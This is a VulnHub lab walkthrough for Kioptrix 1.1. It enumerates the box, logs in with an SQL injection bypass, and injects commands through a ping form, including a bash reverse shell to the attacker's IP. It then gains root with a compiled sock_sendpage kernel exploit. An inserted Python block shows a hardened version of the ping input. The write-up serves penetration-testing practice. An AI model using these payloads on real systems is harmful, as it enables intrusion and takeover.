Kioptrix 1.1 ~ VulnHub
Enumeration
NMAP
First, I went ahead and launched a port scan against the target machine.
nmap -Pn -A -sV -p- $target
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp open http syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind syn-ack ttl 64 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 615/udp status
|_ 100024 1 618/tcp status
443/tcp open ssl/https? syn-ack ttl 64
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/organizationalUnitName=SomeOrganizationalUnit/[email protected]/localityName=SomeCity
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/organizationalUnitName=SomeOrganizationalUnit/[email protected]/localityName=SomeCity
618/tcp open status syn-ack ttl 64 1 (RPC #100024)
631/tcp open ipp syn-ack ttl 64 CUPS 1.1
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql syn-ack ttl 64 MySQL (unauthorized)
MAC Address: 00:0C:29:A3:ED:9F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
WEB - 80
/cgi-bin/ (Status: 403) [Size: 289]
/cgi-bin/.html (Status: 403) [Size: 294]
/index.php (Status: 200) [Size: 667]
/manual (Status: 301) [Size: 315]
/usage (Status: 403) [Size: 286]
/

/manual

Exploitation
Authentication Bypass
The web app was vulnerable to SQL Injection Authentication Bypass as shown below.
admin' or '1'='1'#
http://192.168.0.132/index.php


Command Injection
I noticed that the web app executed commands on the base system based on user input.


Thus, I decided to try to inject custom commands into this field to trigger the system to run them.
127.0.0.1 && whoami


As seen above, I was able to get command execution on the machine via the web portal. I then used this vulnerability to get a reverse shell back to my attack box as follows.
127.0.0.1 && bash -i >& /dev/tcp/192.168.0.108/443 0>&1


And it worked!
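A defender's view of the ping form above, as an added Python example (not the VM's own PHP): the vulnerable shell-out pattern beside a hardened version that validates the value as a single IP address and passes an argv list with no shell, so a value like 127.0.0.1 && whoami is rejected rather than executed.

```python
import ipaddress
import re
import subprocess

# Metacharacters that let a "ping target" value turn into a second command
# when the value is handed to a shell (the && in "127.0.0.1 && whoami").
SHELL_META = re.compile(r"[;&|`$<>\n(){}\\'\"]")


def vulnerable_ping_command(user_input: str) -> str:
    """The classic pattern: form value pasted into a shell command string.
    Returns the string instead of running it, so the effect is visible."""
    return f"ping -c 3 {user_input}"


def hardened_ping_argv(user_input: str) -> list:
    """Validate strictly, then build an argv list so no shell parses it."""
    value = user_input.strip()
    if SHELL_META.search(value):
        raise ValueError("shell metacharacters are not allowed")
    try:
        ip = ipaddress.ip_address(value)  # raises for anything but one IP
    except ValueError as exc:
        raise ValueError(f"not an IP address: {value!r}") from exc
    return ["ping", "-c", "3", str(ip)]


def accepted(user_input: str) -> bool:
    """True if the hardened validator would let this value through."""
    try:
        hardened_ping_argv(user_input)
    except ValueError:
        return False
    return True


def run_ping(user_input: str, timeout: float = 10.0) -> str:
    """Execute the validated argv with shell=False and return ping's output."""
    proc = subprocess.run(hardened_ping_argv(user_input), capture_output=True,
                          text=True, timeout=timeout)
    return proc.stdout


if __name__ == "__main__":
    probe = "127.0.0.1 && whoami"  # the write-up's injection payload
    print(vulnerable_ping_command(probe))  # both commands reach the shell
    print(accepted(probe), accepted("127.0.0.1"))  # False True
    print(hardened_ping_argv("127.0.0.1"))
```

Rejected values are also worth logging, since a form that only ever expects an IP address should never see shell metacharacters from a legitimate user.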
Privilege Escalation
Linpeas
While running linpeas, I noticed that the box was running a pretty old Linux kernel version (2.6.9-55.EL).

Searchsploit
I then made my way to searchsploit to look for a kernel exploit that would fit this particular target.
searchsploit linux 2.6 centos

Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' | linux/local/9545.c
This was the exploit I ended up going with!

GCC
I then transferred the file over to the remote machine before compiling it with GCC. This was to ensure that the architecture matched the executable in the end.

gcc -o exploit 9545.c

However, I ran into the error shown. All C source files need a newline at the end of the file for compilation. I just had to add that before compiling again.


After fixing that, the exploit compiled with no issues.
Rooty

And I was the root user! 😁
-Nee